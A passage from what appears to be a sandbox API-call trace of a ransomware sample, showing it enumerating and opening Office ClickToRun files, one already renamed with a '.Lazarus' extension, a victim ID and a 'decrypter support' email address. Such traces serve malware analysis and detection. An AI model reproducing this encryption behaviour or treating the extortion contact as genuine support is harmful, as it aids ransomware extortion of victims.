lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcr120.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcr120.dll", lpUsedDefaultChar=0x0) returned 71 [0096.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0096.656] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.656] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0096.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0096.919] AreFileApisANSI () returned 1 [0096.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0096.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8aeb0 [0096.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=71 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcr120.dll") returned 71 [0096.919] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcr120.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcr120.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0096.920] GetFileType (hFile=0x418) returned 0x1 [0096.920] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0096.920] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0096.920] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0096.920] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0096.920] CloseHandle (hObject=0x418) returned 1 [0096.920] AreFileApisANSI () returned 1 [0096.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0096.920] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a6f8 [0096.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x8a6f8, cchWideChar=71 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcr120.dll") returned 71 [0096.921] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcr120.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcr120.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.921] GetLastError () returned 0x20 [0096.921] GetLastError () returned 0x20 [0096.921] SetLastError (dwErrCode=0x20) [0096.921] GetLastError () returned 0x20 [0096.921] SetLastError (dwErrCode=0x20) [0096.921] GetLastError () returned 0x20 [0096.921] SetLastError (dwErrCode=0x20) [0096.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0096.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0096.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0096.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0096.921] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.921] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.921] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80cbb8b2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80cbb8b2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x92bb9e8d, ftLastWriteTime.dwHighDateTime=0x1d5df27, nFileSizeHigh=0x0, nFileSizeLow=0x5b1068, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="OfficeC2RClient.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus", cAlternateFileName="OFFICE~1.LAZ")) returned 1 [0096.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0096.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68b80 [0096.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0096.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46048 [0096.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b80 | out: hHeap=0x20000) returned 1 [0096.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8c650 [0096.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46048 | out: hHeap=0x20000) returned 1 [0096.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe6) returned 0x55f20 [0096.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c650 | out: hHeap=0x20000) returned 1 [0096.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x817a8 [0096.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x816f0 [0096.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x811e8 [0096.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x816f0 | out: hHeap=0x20000) returned 1 [0096.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x817a8 | out: hHeap=0x20000) returned 1 [0096.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0096.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x811e8 | out: hHeap=0x20000) returned 1 [0096.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0096.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0096.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0096.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0096.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0096.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0096.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0096.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0096.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81078 [0096.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0096.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x812a0 [0096.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120) returned 0x5e870 [0096.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0096.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x812a0 | out: hHeap=0x20000) returned 1 [0096.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120) returned 0x4e568 [0096.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e870 | out: hHeap=0x20000) returned 1 [0096.922] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.923] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.923] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.923] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e568 | out: hHeap=0x20000) returned 1 [0096.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81078 | out: hHeap=0x20000) returned 1 [0096.923] AreFileApisANSI () returned 1 [0096.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus", lpUsedDefaultChar=0x0) returned 140 [0096.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a5c8 [0096.923] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.923] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0096.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0096.923] AreFileApisANSI () returned 1 [0096.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a5c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 140 [0096.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x118) returned 0x915a8 [0096.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a5c8, cbMultiByte=-1, lpWideCharStr=0x915a8, cchWideChar=140 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 140 [0096.923] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0096.924] GetFileType (hFile=0x418) returned 0x1 [0096.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x915a8 | out: hHeap=0x20000) returned 1 [0096.924] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0096.924] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0096.924] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0096.924] CloseHandle (hObject=0x418) returned 1 [0096.925] AreFileApisANSI () returned 1 [0096.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a5c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 140 [0096.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x118) returned 0x92010 [0096.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a5c8, cbMultiByte=-1, lpWideCharStr=0x92010, cchWideChar=140 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 140 [0096.925] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0096.925] GetFileType (hFile=0x418) returned 0x1 [0096.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x92010 | out: hHeap=0x20000) returned 1 [0096.925] CloseHandle (hObject=0x418) returned 1 [0096.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0096.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0096.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0096.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0096.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0096.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0096.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0096.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0096.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0096.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0096.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0096.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0096.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0096.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0096.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81580 [0096.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81cb0 [0096.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81a88 [0096.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81358 [0096.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81a88 | out: hHeap=0x20000) returned 1 [0096.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81cb0 | out: hHeap=0x20000) returned 1 [0096.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81580 | out: hHeap=0x20000) returned 1 [0096.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81358 | out: hHeap=0x20000) returned 1 [0096.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x80fc0 [0096.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81078 [0096.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81130 [0096.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x811e8 [0096.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81130 | out: hHeap=0x20000) returned 1 [0096.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81078 | out: hHeap=0x20000) returned 1 [0096.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80fc0 | out: hHeap=0x20000) returned 1 [0096.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81410 [0096.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x811e8 | out: hHeap=0x20000) returned 1 [0096.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81580 [0096.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81410 | out: hHeap=0x20000) returned 1 [0096.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0096.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0096.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81580 | out: hHeap=0x20000) returned 1 [0096.927] AreFileApisANSI () returned 1 [0096.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a5c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 140 [0096.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x118) returned 0x91b70 [0096.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a5c8, cbMultiByte=-1, lpWideCharStr=0x91b70, cchWideChar=140 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 140 [0096.927] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80cbb8b2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80cbb8b2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x92bb9e8d, ftLastWriteTime.dwHighDateTime=0x1d5df27, nFileSizeHigh=0x0, nFileSizeLow=0x5b1068)) returned 1 [0096.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x91b70 | out: hHeap=0x20000) returned 1 [0096.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0096.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0096.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0096.927] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.927] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.927] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d07d85, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d07d85, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb7179d00, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0xf34d8, dwReserved0=0x327f590, dwReserved1=0x2000002, cFileName="OfficeC2RCom.dll", cAlternateFileName="OFFICE~1.DLL")) returned 1 [0096.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0096.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0096.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0096.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0096.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0096.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0096.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0096.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0096.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0096.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0096.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0096.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0096.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0096.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0096.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0096.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0096.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0096.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0096.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0096.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0096.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0096.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0096.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c998 [0096.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0096.928] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.928] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.928] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.928] InitOnceExecuteOnce (in: 